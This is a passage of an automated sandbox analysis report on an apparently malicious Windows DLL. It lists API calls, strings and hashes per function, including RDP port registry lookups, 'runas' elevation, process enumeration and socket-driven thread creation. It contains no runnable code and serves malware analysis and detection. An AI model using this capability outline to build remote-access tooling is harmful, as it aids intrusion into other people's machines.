                                                  • Instruction ID: 37eccab93eae1f9570d16d686a1212c04e0715a42fba5b1868afdc0cba55ac79
                                                  • Opcode Fuzzy Hash: 7d5be02d86cc8920d62cf2d17b5541d9373f0ddaeac744c5cd82ef4eaf4a695e
                                                  • Instruction Fuzzy Hash: 1241ACB5600B058FD704CF68C881B96F7E4FF49750F004A2DE6AA87381EB70BA54CB81
                                                  APIs
                                                  • ?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z.MSVCP60(?,?,?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009AAA
                                                  • ?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z.MSVCP60(?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009ABB
                                                  • ?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z.MSVCP60(?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009ACC
                                                  • #825.MFC42(?,?,?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009AF5
                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009B2A
                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,100096F0,00000001,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009B3D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: D@2@@std@@D@std@@Refcnt@?$basic_string@U?$char_traits@V?$allocator@$CloseHandle$#825
                                                  • String ID:
                                                  • API String ID: 3981934315-0
                                                  • Opcode ID: 8b2b594f4aed80e73da269208a1a90eec485e5e9e688899508e82b25adb2269c
                                                  • Instruction ID: 3f5e6c1ba8cdd1ffd5d3919399f724efa296fb395ea5f4111f29f1806b4e9a25
                                                  • Opcode Fuzzy Hash: 8b2b594f4aed80e73da269208a1a90eec485e5e9e688899508e82b25adb2269c
                                                  • Instruction Fuzzy Hash: A53182747006019FE744CF29C980996B7E9FF85790B14866DF95ACB795EB30EC40CBA0
                                                  APIs
                                                  • _snprintf.MSVCRT ref: 1002CCCF
                                                    • Part of subcall function 1002CBD0: inet_addr.WS2_32(?), ref: 1002CBDA
                                                  • recv.WS2_32(00000000,?,00000002,00000000), ref: 1002CD31
                                                  • CreateThread.KERNEL32(00000000,00000000,1002CBF0,?,00000000,?), ref: 1002CD80
                                                  • CloseHandle.KERNEL32(00000000), ref: 1002CD94
                                                  • Sleep.KERNEL32(000003E8), ref: 1002CD9D
                                                  • closesocket.WS2_32(00000000), ref: 1002CDB1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateHandleSleepThread_snprintfclosesocketinet_addrrecv
                                                  • String ID:
                                                  • API String ID: 1576220768-0
                                                  • Opcode ID: 8ad320643c87d1d994209b64ff02a47034fd213ba19061fd0144fe89b068bf57
                                                  • Instruction ID: 96c894d9fd75394a03c3a3a038aab70250070bdc91babe31f0fa3587584578b1
                                                  • Opcode Fuzzy Hash: 8ad320643c87d1d994209b64ff02a47034fd213ba19061fd0144fe89b068bf57
                                                  • Instruction Fuzzy Hash: 8831AD74204355ABE320DF54DCC0FAB7BE8FB84740F504929F688932A1D775A8568BA2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: malloc$Tablefree
                                                  • String ID:
                                                  • API String ID: 2903114640-0
                                                  • Opcode ID: 86186fa1577d632ba100a165714a33ce1776c10956f63b3ae715142a8fd396b4
                                                  • Instruction ID: a9296b02b71586264760a7329d97d0c6985c525f31e5c152af02a019acfba51a
                                                  • Opcode Fuzzy Hash: 86186fa1577d632ba100a165714a33ce1776c10956f63b3ae715142a8fd396b4
                                                  • Instruction Fuzzy Hash: 8C1144736022246BD315CA1EBC81BDFB3D8FBC1661F14052AF919CB240DB25EE8586E2
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1002BE71
                                                  • Process32First.KERNEL32(00000000,00000000), ref: 1002BE8B
                                                  • _strcmpi.MSVCRT ref: 1002BEA7
                                                  • Process32Next.KERNEL32(00000000,?), ref: 1002BEB6
                                                  • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 1002BEC0
                                                  • CloseHandle.KERNEL32(00000000,?,76C08400), ref: 1002BED3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32_strcmpi
                                                  • String ID:
                                                  • API String ID: 2975077063-0
                                                  • Opcode ID: f37c4a8f1e108d711664304603285570b95f9b7a6bb29a86161c82b5fdfa154d
                                                  • Instruction ID: 6ed28245b0ed33383696f76e5f749c63f4d2afb73675a39276b596060f345c94
                                                  • Opcode Fuzzy Hash: f37c4a8f1e108d711664304603285570b95f9b7a6bb29a86161c82b5fdfa154d
                                                  • Instruction Fuzzy Hash: 6F01B17A1016116EE750EB24EC80ADF73D9FB85361F854929FE5882280DB3CA91986B2
                                                  APIs
                                                  • wsprintfA.USER32 ref: 1002516A
                                                    • Part of subcall function 10014700: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                    • Part of subcall function 10014700: GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                    • Part of subcall function 10014700: #823.MFC42(?), ref: 10014763
                                                    • Part of subcall function 10014700: #823.MFC42(?,?), ref: 100147DA
                                                  • lstrlenA.KERNEL32(?), ref: 10025196
                                                  • lstrlenA.KERNEL32(?), ref: 100251A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823lstrlen$AddressLibraryLoadProcwsprintf
                                                  • String ID: 3389$PortNumber$SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s
                                                  • API String ID: 2676723305-3034822107
                                                  • Opcode ID: 9079390a675a840b0ebd4f6b52439f0f51b899b92c247f5ed0cdb5557fbac3c9
                                                  • Instruction ID: 1cd066c104c9a478e0a138c34f8552c6d84d3580120d1766e39866708e2a8e36
                                                  • Opcode Fuzzy Hash: 9079390a675a840b0ebd4f6b52439f0f51b899b92c247f5ed0cdb5557fbac3c9
                                                  • Instruction Fuzzy Hash: 820149B13002143FE7249224DC42FFB739AEFC8714F40483CFB09A7280DA79AD4586A6
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: getenvmallocsscanf
                                                  • String ID: %ld%c$JPEGMEM$x
                                                  • API String ID: 677315340-3402169052
                                                  • Opcode ID: 0669e045658ea43860243ab56f02b4fc623fadf329bf00e3379d954019d83b75
                                                  • Instruction ID: bf997791e76167fe67e5a25b39f88f01fc4df9a7e6a15bee3b14712724650cb0
                                                  • Opcode Fuzzy Hash: 0669e045658ea43860243ab56f02b4fc623fadf329bf00e3379d954019d83b75
                                                  • Instruction Fuzzy Hash: C44169B44447868FD320CF19E880957FBF8FF45344B904A2EE19A8B651E776E919CF81
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000EC48
                                                    • Part of subcall function 1000EBE0: GetVersionExA.KERNEL32 ref: 1000EBF3
                                                  • ShellExecuteExA.SHELL32(0000003C), ref: 1000ECE7
                                                  • ExitProcess.KERNEL32 ref: 1000ECF5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteExitFileModuleNameProcessShellVersion
                                                  • String ID: <$runas
                                                  • API String ID: 984616556-1187129395
                                                  • Opcode ID: bd45b8a37fbe01eb17e94c971b7a9c186ac961411ccfaf6cfe3c75bf8a9ca120
                                                  • Instruction ID: 4185b391246dfa5e153727e557160ad39cee92afbd1573f849ed58196b9f8123
                                                  • Opcode Fuzzy Hash: bd45b8a37fbe01eb17e94c971b7a9c186ac961411ccfaf6cfe3c75bf8a9ca120
                                                  • Instruction Fuzzy Hash: 4621D5711087849FE314DB68C8147EBB7D5FBC4350F400A2DEB9A932D0DBB59A09CB96
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,00000000,00000000,?,10006B17,00000000), ref: 10006F50
                                                  • VirtualFree.KERNEL32(5D5E5FC0,00000000,00008000,?,10006B17,00000000), ref: 10006F77
                                                  • GetProcessHeap.KERNEL32(00000000,10006B17,?,10006B17,00000000), ref: 10006F80
                                                  • HeapFree.KERNEL32(00000000), ref: 10006F87
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Free$Heap$LibraryProcessVirtual
                                                  • String ID: Wu
                                                  • API String ID: 548792435-4083010176
                                                  • Opcode ID: 9122a4d877bc4996ce9b38b24836df32d42650a468764ef7b8b38eca707a3637
                                                  • Instruction ID: eb7fda223cfc753f1fed3d2c8a6d49319030a12fba69635afc4c9d01848446bd
                                                  • Opcode Fuzzy Hash: 9122a4d877bc4996ce9b38b24836df32d42650a468764ef7b8b38eca707a3637
                                                  • Instruction Fuzzy Hash: E8112A756007129BE720CF69DC84F57B3E9BF48790F154A28F56AD7694DB30F8418B60
                                                  APIs
                                                  • ShellExecuteExA.SHELL32 ref: 10009EC1
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10009ED2
                                                  • CloseHandle.KERNEL32(?), ref: 10009EDD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseExecuteHandleObjectShellSingleWait
                                                  • String ID: <$@
                                                  • API String ID: 3837156514-1426351568
                                                  • Opcode ID: a256fbbcab775a1f3604715199f882c7f0444da02567230ad93e6343b4ac91f9
                                                  • Instruction ID: 4f3a71a7022bf43642dcc1f3ab8c414678e0bae02fb7ae8385496add38081c6f
                                                  • Opcode Fuzzy Hash: a256fbbcab775a1f3604715199f882c7f0444da02567230ad93e6343b4ac91f9
                                                  • Instruction Fuzzy Hash: 86F08C715083409BE704CF28C848A5BBBE4BFC4350F084A2DF289972A0DBB6DA44CB96
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,WaitForSingleObject,?,10016C10,?,?,?,?,?,10098A80,000000FF), ref: 10010B7D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10010B84
                                                  • Sleep.KERNEL32(00000096,?,?,?,?,?,10098A80,000000FF), ref: 10010B97
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcSleep
                                                  • String ID: KERNEL32.dll$WaitForSingleObject
                                                  • API String ID: 188063004-3889371928
                                                  • Opcode ID: 1505c6372a6b5f5a7e2015909548fb5756e583b9251caf1c5d531eae02cc10d3
                                                  • Instruction ID: 2f25d5efcf6a9ea09ffc80339e96632aadd97f0a1fca395ea0de9424a810f75f
                                                  • Opcode Fuzzy Hash: 1505c6372a6b5f5a7e2015909548fb5756e583b9251caf1c5d531eae02cc10d3
                                                  • Instruction Fuzzy Hash: 67D0C7790041256BEA2457A4AD4CDEA3654FB493317040744F525512D1CE609C40C770
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ea42a18e97e3a82291b809ecb384a12a17950c0088f0337ebea46ea9f423f3cf
                                                  • Instruction ID: c650882347852e35ffcbb4eb416d17d698f5a118f4f7130cf3c30c4ac611ed04
                                                  • Opcode Fuzzy Hash: ea42a18e97e3a82291b809ecb384a12a17950c0088f0337ebea46ea9f423f3cf
                                                  • Instruction Fuzzy Hash: E141D5B27003056FF704DF689C81B6777D9FB48395F24452AFA05DB686DB71E80487A0
                                                  APIs
                                                    • Part of subcall function 10005230: #823.MFC42 ref: 1000525B
                                                    • Part of subcall function 10005230: #823.MFC42(?), ref: 1000526A
                                                  • lstrlenA.KERNEL32(?), ref: 1002945B
                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 10029478
                                                  • lstrlenA.KERNEL32(?), ref: 100294B8
                                                  • LocalSize.KERNEL32(00000000), ref: 100294FC
                                                  • LocalFree.KERNEL32(00000000), ref: 1002950E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$#823lstrlen$AllocFreeSize
                                                  • String ID:
                                                  • API String ID: 933119475-0
                                                  • Opcode ID: de1fdc764fb6d7af8fcdc614c3befe84ce97db36611e3d77dc9292dca938265c
                                                  • Instruction ID: baa6dfe5b62ae598e36d45df49c35083ba28316c69925bc8e8f86ac0ab45f9a0
                                                  • Opcode Fuzzy Hash: de1fdc764fb6d7af8fcdc614c3befe84ce97db36611e3d77dc9292dca938265c
                                                  • Instruction Fuzzy Hash: A331B0756083418FD310DF18C884B5BB7E0FB89750F940A1CF896A7390DB34E906CBA2
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?), ref: 10017309
                                                  • CloseHandle.KERNEL32(?), ref: 10017316
                                                  • #823.MFC42(00000110), ref: 1001733A
                                                  • #823.MFC42(00000110), ref: 1001736B
                                                    • Part of subcall function 10018A50: LoadCursorA.USER32(00000000,00000000), ref: 10018B13
                                                  • #823.MFC42(00000110), ref: 10017392
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823$CloseCursorHandleLoadObjectSingleWait
                                                  • String ID:
                                                  • API String ID: 1032503192-0
